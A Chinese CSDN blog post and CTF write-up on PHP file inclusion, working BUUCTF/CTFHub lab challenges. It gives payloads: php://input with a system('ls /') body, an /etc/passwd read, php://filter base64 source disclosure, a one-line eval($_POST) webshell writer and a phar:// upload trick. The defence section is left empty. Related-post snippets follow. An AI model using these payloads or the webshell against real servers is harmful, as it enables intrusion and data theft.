文件包含(借助CTFHUB,buuctf)

已于 2024-04-24 22:33:07 修改
阅读量790 收藏 14
点赞数 8
文章标签: android java 开发语言
于 2024-04-24 22:25:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ndjnddjxn/article/details/138139227
版权
本文详细解释了PHP中的文件包含漏洞原理,涉及00截断、长度限制和文件类型注入等利用方式,同时介绍了如何通过base64编码绕过检查。还讨论了远程代码执行(RCE)的生成,如webshell的创建,以及防范措施,包括限制URL功能和文件上传的安全处理。
摘要由CSDN通过智能技术生成

1.例题一

根据源代码输入  ?file=php://input

          利用bp抓包并发给Repeater,然后构造方法:POST
目标:/?file=php://input     Body:<?php system("ls /"); ?>

使用cat 来查找 flag_7069里的内容

最后得到flag。

2文件包含漏洞知识点:

      一、定义,成因和利用方式

        定义:

使用文件包含函数将文件包起来,直接使用包含文件的代码

        成因:

为了灵活包含文件,将包含的文件设置为变量,通过动态变量来引入需要包含的文件时,用户可对变量值可控而服务器没有对变量值进行合理的校验或者校验被绕过导致的,通常为php语言。

    利用方式:

00截断

  属于RCE绕过,遇到00自动停止

长度截断

Windows :256  Linux  :4096

包含日志文件

包含session

      二、

include 表达式:包含并运行指定文件

例如:

vars.php
<?php


$color = 'green' ;
$fruit = 'apple' ;


?>

两个代码一起看

test.php
<?php


echo "A $color $fruit ";    #打印A,另外两个未被定义

include  'vars.php';

echo "A $color $fruit";    # 定义了两个变量,打印A green apple

?>

还有require表达式也可以有同样作用,但是有不同点,如果你包含的文件有错误(路径错误,语法错误),php代码仍然可以执行,但require就不行;include执行时有返回值,但require没有

例题:

先读取任意文件(绝对路径)  ?file=etc/passwd   (可以变化进行绕过)

      

php://查看源代码

 base64是常见的加密方式,因为给的源码会被注释,用base64可以读取完整(例题二)

php://filter/read=convert.base64-encode/resource=index.php

远程代码生成webshell

只有当allow_url_fopen 或者 allow_url_include为on,还可以远程读取文件

例如:

<?php file_put_contents('shell.php','<?php eval($_POST["data"];?>);?>  #插入一句话木马

php://input

可将php代码POST发送执行(例题二)

条件:allow_url_include为on

phar://       (比较常用)

phar://    .png/shell.php 解压缩包的函数,无论后缀是什么,都会当做压缩包解压。

结合文件上传,将shell_dir.php压缩成shell_dir.zip ,然后把压缩包重命名为shell_dir_zip.png

然后上传shell_dir_zip_png。

总结:

防御方法

             

3.例题二:

直接点击

得到这个后,flag就是在该页面下,就想到用通过php://查源码

得到后解密,得到flag

ndjnddjxn
关注
  • 8
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
BUUCTF学习(四): 文件包含tips
初尘屿风的博客
10-16 556
-
BUUCTF【Web】Include(文件包含伪协议)
qq_70434663的博客
03-01 566
进入靶场后习惯的右键查看源码但什么都没有发现,点击“tips”后得到“can you find out the flag?”内容源码也没有什么内容。其实题目已经提示了“include”文件包含漏洞(伪协议)。最后在进行base64解码就可以得到flag了。对于文件包含漏洞大家可以看。
文件包含BUGKU BUUCTF
zbbjya的博客
03-16 244
查看源代码 图片显示为文件包含 抓了一下包没啥发现 改了一下头,使用php://input 好像也没有什么用 说明这样的方式是不对的php伪协议 有 php://input 伪协议相当于一个削弱post的方法 php://filter可以获取指定文件源码,php://filter 是php中独有的一个协议,可以作为一个中间流来处理其他流,可以进行任意文件的读取;根据名字,filter,可以很容易想到这个协议可以用来过滤一些东西; 然后我们试试用这个 具体用法可看 https://blog.csdn.ne
buuctf-Secret File(涉及文件包含)
m0_62094846的博客
10-27 195
打开网页后出现这样的页面,没有可以点击的地方,也没出现什么有用的信息,查看源代码 也没看到什么有用的信息,但出现了一个可以点击的代码,点击一下,进入这样的界面 又出现一个按钮,点击后却说查阅结束,要我们回去看看 查看后有个有意思的发现 源页面中的代码是action.php 但是点开后的页面却是end.php 所以可以判断两个页面之间还有一个页面,但是无论怎么输入action.php,页面都会跳转到end.php,可能是页面转的太快,试试抓包让它停下来 抓包...
Buuctf-Web-[ACTF2020 新生赛]Include 题解&思路总结
m0_62239233的博客
10-16 508
文件包含漏洞。
BUUCTF web题目之 Include
m0_54993799的博客
12-10 401
用php://filter 构造payload, 顺利获取到flag,但此时的flag是经过base64加密的。file= 且这题的题目为 Include , 可见这关可用文件包含来获得flag。点击 tips 页面跳转到flag.php 得到了下面的这句话。进行base64解密,得到如下的flag。登录BUUCTF在线测评。开启靶机,访问得到如下页面。右键检查但无发现有用信息。
js借助ActiveXObject实现创建文件
10-26
创建文件的方法有很多,在本文为大家详细介绍下js中时如何实现的,感兴趣的朋友不要错过了
asp.net中MVC借助Iframe实现无刷新上传文件实例
10-25
主要介绍了asp.net中MVC借助Iframe实现无刷新上传文件的方法,详细分析了前端界面、回调函数与后台处理的详细流程,非常具有参考借鉴价值,需要的朋友可以参考下
CSV文件转SHP文件
最新发布
02-08
不需要安装Arcgis等Gis...目前借助shape-tools中DOS命令创建shp文件,如有二次开发需要,可将直接采用二进制读写方式,去掉第三方软件,软件进一步精简,通用性更强。压缩包内有测试数据,可按照测试数据格式自行编辑。
buuctf [ACTF2020 新生赛]Include
qq_1873822的博客
03-03 183
本题主要考查了利用php://filter伪协议进行文件包含 进入题目根据Tip进入正题,可以看到URL中存在文件包含 首先尝试php://input伪协议: 发现被过滤了 然后尝试使用php://filter伪协议来继续包含,使用 “php://filter"伪协议” 来进行包含。当它与包含函数结合时,php://filter流会被当作php文件执行。所以我们一般对其进行编码,阻止其不执行。从而导致任意文件读取。 构造playload ?file=php://filter/read=convert
BUUCTF之MISC(持续更新)
12-21
写在前面:这两天初接触ctf。先从最简单的杂项做起。之前看了杂项的教程也听了课,基本没怎么看答案。于是出现了好多问题,边做题边解决问题。。虽然这样对于深入学习不太好但是对于特别懒的我还挺喜欢这样的- -有几次真的心态崩溃。写一个记录贴。kali真的是个好东西。。 解决了的问题: kali忘了密码怎么办 kali的vmroots兼容性问题与如何更新源 php的基础语法 wenhex的使用方法 kali的基本工具了解 签到题 睡醒后做的第一个签到题,我可能脑子还在梦里,没有看见那么大的一个flag。 金三胖(帧隐藏问题) 一个gif图片 用stdeslove打开后用FB帧浏览器分离帧。最开始分离
CTF-MISC:BUUCTF练习汇总(26-40题)
燕麦葡萄干的博客
08-03 1748
.-. ----. …- ----. -.-. -…----- .---- —…----- ----. …— ----. .---- ----. .---- -.-.4)key_part_one中NUL文件包含了前半段flag,key_part_two中where_is_flag_part_two.txt:flag_part_two_is_here.txt文件包含了后半段flag。binwalk+foremost分离得到zip压缩包,解压后得到的文件里存在flag.txt,打开即可获取到flag。
buuctf-Had a bad day(文件包含
m0_62094846的博客
11-21 835
两个按钮随便点一个 看样子有点像文件包含 ?category=php://filter/read=convert.base64-encode/resource=woofers base64解密后得到代码 但这只是说明了图片大小,没有用 应该用这个 ?category=php://filter/read=convert.base64-encode/resource=index 不能加.php,会报错 解密可以得到html代码 <html> <hea...
BUUCTF——Basic题解
Zichel77的博客
08-17 5562
所以我们不能将input设为具体的值,而是在序列化执行,令input=&correct。文件包含在 php 中,涉及到的危险函数有四个,分别是 include()、include_once()、require()、require_once()。程序开发人员一般会把重复使用的函数写到单个文件中,需要使用某个函数时直接调用此文件,无需再次编写,这种文件调用的过程一般被称为文件包含。于是涉及到了md5绕过的问题,md5这个地方可以用md5弱碰撞,因为是弱类型比较。以下几个的md5弱类型比较均相等。...
BUUCTF-堆叠注入-文件包含
m0_64180167的博客
03-28 594
提示我们是include 文件包含打开环境点击我们include 尝试直接访问根目录 失败使用伪协议base64解密。
BUUCTF-Web-文件包含-[极客大挑战 2019]Secret File
weixin_42566218的博客
02-21 1213
BUUCTF-Web-文件包含-[极客大挑战 2019]Secret File 题目链接:BUUCTF 类型:文件包含 知识点: 302隐式重定向、php伪协议(php://filter) 解题过程 直接看页面没啥信息,F12打开控制台发现一个超链接,因为设置了style样式和背景颜色一样所以看不出来,其实可以在页面中用ctrl+a找到这个超链接标签 跟随超链接进入到Archive_room.php页面,这里有一个SECRET链接标签,用控制台看是链接到action.php页面的 但是点
BUU 文件包含漏洞-[ACTF2020 新生赛]Include
Ivyyyyyy1的博客
10-16 2108
一、题目 这里看两个页面的源代码都没有线索 回到题目Include 加之url里有 /?file=flag.php 容易想到文件包含漏洞 二、解题 1. php:// 用来访问输入输出流,有两个常用的子协议 (1)php://filter 用来过滤筛选文件 php语法文件被include成功时,可直接执行命令,而非php语法文件被include失败时,会直接输出源码内容 因此我们可以先通过base64编码的方法传入include()函数,这样在不会被识别为p...
CTF实战练习:文件上传漏洞+文件包含漏洞
热门推荐
烟雨天青色
08-06 1万+
BugkuCTF:文件包含2 CTF实战练习:http://120.78.xx.xxx:8013 这道题目看起来又像是跟前一道题是差不多的样子,继续先查看index.php里面的内容: 哎~这次好像显示的并不是base64编码的内容,但是感觉起来这个信息一点用都没有,第二步,查看网页源代码: 从网页源代码里我们可以看出在JS脚本里包含了一个html页面,我们现在来访问一下这个页...
修改class文件里的代码不借助工具
09-07
修改class文件里的代码,不借助工具的方法有限且复杂。一般情况下,class文件是Java编译器编译Java源代码生成的文件,其中包含了Java字节码指令和相关的元数据信息。修改class文件需要对字节码有一定的了解,并且...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值